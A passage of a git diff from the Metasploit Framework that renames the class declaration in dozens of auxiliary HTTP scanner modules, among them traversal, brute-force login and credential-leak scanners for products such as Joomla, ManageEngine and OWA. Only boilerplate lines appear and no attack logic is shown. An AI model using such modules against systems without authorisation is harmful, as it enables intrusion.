b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb index 5281c98d42..66072a6adb 100644 --- a/modules/auxiliary/scanner/http/joomla_pages.rb +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb index 3579874eb2..dee21277e9 100644 --- a/modules/auxiliary/scanner/http/joomla_plugins.rb +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb index 3e3f59853e..3e280c8ad8 100644 --- a/modules/auxiliary/scanner/http/joomla_version.rb +++ b/modules/auxiliary/scanner/http/joomla_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Joomla include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/linknat_vos_traversal.rb b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb index af02b848e7..668cfc4337 100644 --- a/modules/auxiliary/scanner/http/linknat_vos_traversal.rb +++ b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb index 66f7697bd4..4b232b66dc 100644 --- a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb +++ b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb index b32f14a907..bae0916994 100644 --- a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 4fa73fb05a..8e65e4407c 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb index 73bda69bce..87668dd476 100644 --- a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb b/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb index d8a90b51f6..69fe63fff8 100644 --- a/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb +++ b/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/manageengine_desktop_central' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb index 60bc2d9032..2204a9ecda 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb index 1f027d4c9a..3d6acc979a 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb index c6931cdcd4..77d6dc7091 100644 --- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb index 6756ff3ede..0c403db076 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb index 3888f73937..8fc76e5fe0 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index b2a9114ece..8f60998e85 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb index 09bb4e0eba..8a5734b6b9 100644 --- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb +++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/mybook_live_login.rb b/modules/auxiliary/scanner/http/mybook_live_login.rb index 1003f451ea..caeca141c7 100644 --- a/modules/auxiliary/scanner/http/mybook_live_login.rb +++ b/modules/auxiliary/scanner/http/mybook_live_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mybook_live' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/netdecision_traversal.rb b/modules/auxiliary/scanner/http/netdecision_traversal.rb index eafbdfcd0f..0d6064563a 100644 --- a/modules/auxiliary/scanner/http/netdecision_traversal.rb +++ b/modules/auxiliary/scanner/http/netdecision_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb index a328536b50..5f7bb5fc2b 100644 --- a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb index aed2e261ce..b49e3e4137 100644 --- a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/novell_mdm_creds.rb b/modules/auxiliary/scanner/http/novell_mdm_creds.rb index 62c8a6ba56..3c03a14c2d 100644 --- a/modules/auxiliary/scanner/http/novell_mdm_creds.rb +++ b/modules/auxiliary/scanner/http/novell_mdm_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 3aca25533a..6bcc2dcb1e 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/open_proxy.rb b/modules/auxiliary/scanner/http/open_proxy.rb index 24bb2b48d2..123e89d6df 100644 --- a/modules/auxiliary/scanner/http/open_proxy.rb +++ b/modules/auxiliary/scanner/http/open_proxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login.rb b/modules/auxiliary/scanner/http/openmind_messageos_login.rb index 02cf8f0737..3402e97dd7 100644 --- a/modules/auxiliary/scanner/http/openmind_messageos_login.rb +++ b/modules/auxiliary/scanner/http/openmind_messageos_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb index e690f93256..1839e47ddd 100644 --- a/modules/auxiliary/scanner/http/options.rb +++ b/modules/auxiliary/scanner/http/options.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb index f959077b1b..4d69c421a2 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb index ec0e5905d9..f536b5a39a 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb index fe6d37b75a..2f1167132c 100644 --- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb +++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb b/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb index 7f42e101bf..542b5ef896 100644 --- a/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb +++ b/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index 7beb2986ad..b2393bbd3b 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index c2524f96b5..f1107f89a4 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb index e55b96cefa..fea9b90324 100644 --- a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb +++ b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb index 5ff8ef25df..abcb16ce3f 100644 --- a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb +++ b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb index 46ec92c891..cb12852868 100644 --- a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/rails_mass_assignment.rb b/modules/auxiliary/scanner/http/rails_mass_assignment.rb index fecc5f3613..5bdbe7bed5 100644 --- a/modules/auxiliary/scanner/http/rails_mass_assignment.rb +++ b/modules/auxiliary/scanner/http/rails_mass_assignment.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'uri' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index ed182ca85f..3e6f52150b 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index 70aebda581..3537b86519 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -9,7 +9,7 @@ require 'pathname' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index f41e13f714..cb103e7da7 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/rips_traversal.rb b/modules/auxiliary/scanner/http/rips_traversal.rb index 9aca918117..2b42cb8c54 100644 --- a/modules/auxiliary/scanner/http/rips_traversal.rb +++ b/modules/auxiliary/scanner/http/rips_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/robots_txt.rb b/modules/auxiliary/scanner/http/robots_txt.rb index ea743fe30f..4d9933953b 100644 --- a/modules/auxiliary/scanner/http/robots_txt.rb +++ b/modules/auxiliary/scanner/http/robots_txt.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/s40_traversal.rb b/modules/auxiliary/scanner/http/s40_traversal.rb index b369a1bc57..49fa51058f 100644 --- a/modules/auxiliary/scanner/http/s40_traversal.rb +++ b/modules/auxiliary/scanner/http/s40_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index 701edc6bbb..f83d2b5033 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb index bdcae03031..aef82de583 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index aa193ba135..f56d659877 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb index 60fe402ea0..8e33ae7cea 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb index 279ceaa5a4..817d830d11 100644 --- a/modules/auxiliary/scanner/http/scraper.rb +++ b/modules/auxiliary/scanner/http/scraper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb index 9ede831383..7567b73111 100644 --- a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb +++ b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb index af7c588853..64f8ba1137 100644 --- a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb +++ b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sevone_enum.rb b/modules/auxiliary/scanner/http/sevone_enum.rb index defb2c5451..9e8a38d6c5 100644 --- a/modules/auxiliary/scanner/http/sevone_enum.rb +++ b/modules/auxiliary/scanner/http/sevone_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index 37eb87f217..19c37446a5 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb index 82d83b8e7f..c7f90ebff3 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb index b3014a210f..26cd5777e9 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb index c3f7d4a499..e145de83eb 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb index 41efd17717..b7a87ad514 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/soap_xml.rb b/modules/auxiliary/scanner/http/soap_xml.rb index 876f827950..adc6eb3a10 100644 --- a/modules/auxiliary/scanner/http/soap_xml.rb +++ b/modules/auxiliary/scanner/http/soap_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/sockso_traversal.rb b/modules/auxiliary/scanner/http/sockso_traversal.rb index bcd814b07c..b9deea0f9c 100644 --- a/modules/auxiliary/scanner/http/sockso_traversal.rb +++ b/modules/auxiliary/scanner/http/sockso_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/splunk_web_login.rb b/modules/auxiliary/scanner/http/splunk_web_login.rb index 2b630f3631..35833d09af 100644 --- a/modules/auxiliary/scanner/http/splunk_web_login.rb +++ b/modules/auxiliary/scanner/http/splunk_web_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index 6e5883402a..77969a4f9e 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/socket/range_walker' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb index 195236652b..56a0b065c0 100644 --- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb +++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/ssl_version.rb b/modules/auxiliary/scanner/http/ssl_version.rb index 923d4a4368..ee3e135338 100644 --- a/modules/auxiliary/scanner/http/ssl_version.rb +++ b/modules/auxiliary/scanner/http/ssl_version.rb @@ -7,7 +7,7 